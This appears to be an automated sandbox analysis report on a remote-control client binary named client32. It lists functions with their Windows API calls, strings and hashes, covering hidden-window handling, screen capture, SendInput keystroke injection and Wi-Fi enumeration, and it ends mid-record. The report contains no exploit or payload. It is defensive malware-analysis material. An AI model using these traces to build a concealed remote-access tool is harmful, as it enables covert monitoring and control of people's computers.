Part of subcall function 11141240: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
Part of subcall function 11141240: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B

Strings

Failed to load player (%d), xrefs: 1104776E
PCIVideoSlave32, xrefs: 11047746
ShowVideo, xrefs: 11047691
DoShowVideo - could not find %s window, xrefs: 1104774B
D, xrefs: 11047696
pcivideovi.exe /X, xrefs: 1104764D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFolderHandlePathWindow$ErrorExecFileLastMessageModuleNamePost_memset
String ID: D$DoShowVideo - could not find %s window$Failed to load player (%d)$PCIVideoSlave32$ShowVideo$pcivideovi.exe /X
API String ID: 2703108677-1914331637
Opcode ID: a57ee4519ba703a8f2e25a1a0736491b333c6b6e3063ed72018daf3d53b2fb4f
Instruction ID: df49324dfe2f9645e9d9c5157b9fa2fe22eceb11b85c8ea02f295c7466daf7be
Opcode Fuzzy Hash: a57ee4519ba703a8f2e25a1a0736491b333c6b6e3063ed72018daf3d53b2fb4f
Instruction Fuzzy Hash: 0F41A734A0062E9FD710DF64DC85FEDB7E5AF48709F1080A5ED199B281EB71A984CB91

Function 11157010 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 94libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477

LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4
std::exception::exception.LIBCMT ref: 111570CD
__CxxThrowException@8.LIBCMT ref: 111570E2

Strings

wlanapi.dll, xrefs: 11157053
WlanOpenHandle, xrefs: 1115706E
WlanGetAvailableNetworkList, xrefs: 1115709E
WlanCloseHandle, xrefs: 1115707E
WlanFreeMemory, xrefs: 111570AE
WlanEnumInterfaces, xrefs: 1115708E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$Exception@8LibraryLoadThrow_memsetstd::exception::exceptionwsprintf
String ID: WlanCloseHandle$WlanEnumInterfaces$WlanFreeMemory$WlanGetAvailableNetworkList$WlanOpenHandle$wlanapi.dll
API String ID: 1463381176-1736626566
Opcode ID: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
Instruction ID: caad9b3ffb412b0ce201366128ee2238a993313849ab4ce7a7f1ca44c3893492
Opcode Fuzzy Hash: 883de4db6132f92fd2791c3658098a597c0006997dfe857d44e8fbfa8cff4122
Instruction Fuzzy Hash: 6521E1B5A01718AFC751EFADCD809ABFBF9AF58204700C92AE469C3301E670E401CF91

Function 1111D480 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B73C
Part of subcall function 1111B6C0: SelectPalette.GDI32(?,?,00000000), ref: 1111B751
Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B764
Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B771
Part of subcall function 1111B6C0: DeleteObject.GDI32(?), ref: 1111B796

_free.LIBCMT ref: 1111D49D

Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD

_free.LIBCMT ref: 1111D4B3
_free.LIBCMT ref: 1111D4C8
GdiFlush.GDI32(?,?,?,02208E08), ref: 1111D4D0
_free.LIBCMT ref: 1111D4DD
_free.LIBCMT ref: 1111D4F1
SelectObject.GDI32(?,?), ref: 1111D50D
DeleteObject.GDI32(?), ref: 1111D51A
GetLastError.KERNEL32(?,?,?,?,?,02208E08), ref: 1111D524
DeleteDC.GDI32(?), ref: 1111D54B
ReleaseDC.USER32(?,?), ref: 1111D55E
DeleteDC.GDI32(?), ref: 1111D56B
InterlockedDecrement.KERNEL32(111E59C8), ref: 1111D578

Strings

Error deleting membm, e=%d, xrefs: 1111D52B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Delete$Object_free$Select$ErrorLastPalette$DecrementFlushFreeHeapInterlockedRelease
String ID: Error deleting membm, e=%d
API String ID: 3195047866-709490903
Opcode ID: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
Instruction ID: 8035f785c448485e0a0b583a16257735e59db1fe9725df5791180d2e2a6c23f4
Opcode Fuzzy Hash: 9c2adf2ed169df4d317d6cc21ab7cd28a5f95e7760aa942516609c3df0eba2e1
Instruction Fuzzy Hash: 4D2147B5500B029BD2919F75D8D8AAFF7F4EF89308F10491DE6AA87204DB34B541CF62

Function 1110B660 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,CF3D35D0,?,?,?,?,?,?,?,?,?,11186768,000000FF,?,1110BBB7,00000001), ref: 1110B697
_memset.LIBCMT ref: 1110B732
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110B76A
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110B7FE
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110B829
WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110B83E

Part of subcall function 1110C270: InterlockedDecrement.KERNEL32(FFFFFFFF), ref: 1110C278

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,11186768,000000FF), ref: 1110B865
_free.LIBCMT ref: 1110B898
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110B8D5
timeEndPeriod.WINMM(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110B8E7
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,11186768,000000FF,?,1110BBB7,00000001,CF3D35D0,?,?), ref: 1110B8F1

Strings

End Record %s, xrefs: 1110B6B2
PCIR, xrefs: 1110B839, 1110B83C

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
String ID: End Record %s$PCIR
API String ID: 4278564793-2672865668
Opcode ID: b5e0b74a8c418f385ab2ce3049a2b2a7d5ab592d0c1cc82c66c7b55f037bcb23
Instruction ID: 68bdc4b712a522e2f7fd413d6f6e2c74be8bd2334529b2a2157524006a95b439
Opcode Fuzzy Hash: b5e0b74a8c418f385ab2ce3049a2b2a7d5ab592d0c1cc82c66c7b55f037bcb23
Instruction Fuzzy Hash: 97811775A007099BD720DFA4C881BEBF7F8FF88704F10492DE66A97240D774A941CBA1

Function 11027130 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
GetSystemMetrics.USER32(00000032), ref: 110271EE
GetSystemMetrics.USER32(00000031), ref: 110271F3
LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
LoadIconA.USER32(11000000,00000491), ref: 1102721B
GetSystemMetrics.USER32(00000032), ref: 1102722A
GetSystemMetrics.USER32(00000031), ref: 1102722F
LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240

Strings

_License, xrefs: 1102716D
AdminUserAcknowledge, xrefs: 1102729B
product, xrefs: 11027168
PCIRES, xrefs: 110271BB

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
String ID: AdminUserAcknowledge$PCIRES$_License$product
API String ID: 1946015-1270847556
Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2

Function 1112D530 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,11136285,00000000,?,?), ref: 1112D638
ShowWindow.USER32(00000000,00000000,?,11136285,00000000,?,?), ref: 1112D667

Strings

gUI.hidden_window, xrefs: 1112D651
#32770, xrefs: 1112D5DC, 1112D626
UI.CPP, xrefs: 1112D64C
Hidden, xrefs: 1112D5D7, 1112D621
Client, xrefs: 1112D682
StatusMode, xrefs: 1112D67D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLastShowWindow
String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
API String ID: 3252650109-4091810678
Opcode ID: cd1c5dd9d1a3bb181a6b56db3fe8ce8364c259ea6c9d772f7103b6a17e3b32b4
Instruction ID: fa0dcf7bfd4a991f80e84da17f5d1f9dbb64edff6fc809840f3415ca9232f2cb
Opcode Fuzzy Hash: cd1c5dd9d1a3bb181a6b56db3fe8ce8364c259ea6c9d772f7103b6a17e3b32b4
Instruction Fuzzy Hash: A761E371B40315AFEB11CBD4CC85F6AF7A5E744B18F604129F625AB2C4EAB16840CB85

Function 110ED770 Relevance: 19.6, APIs: 13, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 110ED788
CreateCompatibleDC.GDI32(00000000), ref: 110ED7A8
SelectObject.GDI32(00000000,1113EA00), ref: 110ED7B2
CreateCompatibleDC.GDI32(00000000), ref: 110ED7B8
GetObjectA.GDI32(1113EA00,00000018,?), ref: 110ED7C6
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 110ED7D5
SelectObject.GDI32(00000000,00000000), ref: 110ED7E0
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110ED806
SelectObject.GDI32(00000000,1113EA00), ref: 110ED811
DeleteDC.GDI32(00000000), ref: 110ED81A
SelectObject.GDI32(11003D26,1113EA00), ref: 110ED82A
DeleteDC.GDI32(11003D26), ref: 110ED830
ReleaseDC.USER32(00000000,00000000), ref: 110ED835

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$CompatibleCreate$Delete$BitmapRelease
String ID:
API String ID: 1133104291-0
Opcode ID: ceb17ec1d72bb40bc7306424dc9f0ad1c8efb8a277b4ca78c2ab396d6f478ee4
Instruction ID: 1258555e92a1aaff948274f601fb2b09853c3fe6d534e09920ba7dca75f72fb8
Opcode Fuzzy Hash: ceb17ec1d72bb40bc7306424dc9f0ad1c8efb8a277b4ca78c2ab396d6f478ee4
Instruction Fuzzy Hash: CC314C75D41229BFDB01DFA9CC84FAEB7BCEB89714F10805AF904E3240D674AE418BA1

Function 1100D220 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1100D291

Strings

AlreadyStarted, xrefs: 1100D255
DllInitFailed, xrefs: 1100D247
CannotGetFunc, xrefs: 1100D24E
NoCapClients, xrefs: 1100D263
Unknown error %d, xrefs: 1100D287
Exception, xrefs: 1100D278, 1100D286
NotFound, xrefs: 1100D26A
StillInstances, xrefs: 1100D27F
BadParam, xrefs: 1100D271
RequiresVista, xrefs: 1100D239
AlreadyStopped, xrefs: 1100D25C
CannotLoadDll, xrefs: 1100D240

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
API String ID: 2111968516-2092292787
Opcode ID: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
Instruction ID: 3cf3aa25874edefcff3c72479187094ffc842d22b257f1b299c377845cd1dbea
Opcode Fuzzy Hash: bba3f28cac02fdec35f39604ef1b7e8ddb146cd2578dacf2bc8be98a87cc9d04
Instruction Fuzzy Hash: CCF06C3A68111D57AB0187ED780547EF38D678057D7C8809AF8BCEBE20E912DCE0A296

Function 110FD230 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 247libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(user32,?,?,?,?,00000000), ref: 110FD3AD
GetProcAddress.KERNEL32(00000000,GetGUIThreadInfo), ref: 110FD3C5
_memset.LIBCMT ref: 110FD3E2
GetProcAddress.KERNEL32(?,SendInput), ref: 110FD43A
FreeLibrary.KERNEL32(?,?,00000000), ref: 110FD526

Strings

GetGUIThreadInfo, xrefs: 110FD3BF
SendInput, xrefs: 110FD434
0, xrefs: 110FD3F3
user32, xrefs: 110FD3A8

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$FreeLoad_memset
String ID: 0$GetGUIThreadInfo$SendInput$user32
API String ID: 530983809-271338563
Opcode ID: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
Instruction ID: 43fa602a4ac72add29387a7c175e2a735ec2c38defe54f2081db145d70293a55
Opcode Fuzzy Hash: be1e91ac694330f965b28f15093c1c5f42510e737a99044b1ed0c3d2e03dee73
Instruction Fuzzy Hash: DBA1A270E043A69FDB16CF64CC85BADBBF9FB44708F0081A9E52897284DB759A84CF51

Function 1105D190 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130windowregistryCOMMON

Download Yara Rule

APIs

